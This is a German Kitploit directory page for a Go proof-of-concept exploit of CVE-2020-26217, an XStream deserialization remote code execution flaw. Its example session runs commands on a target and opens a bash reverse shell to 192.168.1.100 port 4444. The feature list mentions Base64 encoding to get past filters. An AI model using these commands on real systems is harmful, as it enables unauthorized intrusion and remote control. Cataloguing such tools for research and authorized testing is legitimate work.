Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-26217-XStream — CVE-2020-26217 XStream Deserialisierungs-PoC | Kitploit
Tools/GitHubGitHub/kairo-one/cve-2020-26217-xstream
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubkairo-one/cve-2020-26217-xstream

CVE-2020-26217-XStream

CVE-2020-26217 XStream Deserialisierungs-PoC

Repository anzeigen
21vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-26217 XStream RCE Exploit

XStream-Exploit-Tool für Remote-Code-Ausführung.

Schwachstellenbeschreibung

CVE-2020-26217 ist eine Deserialisierungsschwachstelle in der XStream-Bibliothek. Ein Angreifer kann durch das Erstellen bösartiger XML-Daten eine Remote-Code-Ausführung auslösen.

Betroffene Version: XStream <= 1.4.13

Verwendung

root@kitploit:~
go run poc.go <Ziel-URL>

Beispiel

root@kitploit:~
# Tool ausführen
go run poc.go http://target.com:8080/?data

# Nach dem Wechsel in den interaktiven Modus Befehle eingeben
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit

Funktionen

  • Interaktive Befehlsausführung
  • Automatisches Parsen von URL-Parameternamen
  • Base64-Kodierung zur Umgehung von Filterung spezieller Zeichen
  • Unterstützt HTTPS (überspringt Zertifikatsprüfung)
  • Kompilierung

    root@kitploit:~
    go build -o poc poc.go
    

    Haftungsausschluss

    Dieses Tool dient ausschließlich der Sicherheitsforschung und autorisierten Tests. Eine Nutzung für illegale Zwecke ist untersagt. Der Anwender trägt die entsprechende rechtliche Verantwortung selbst.

    Tool herunterladen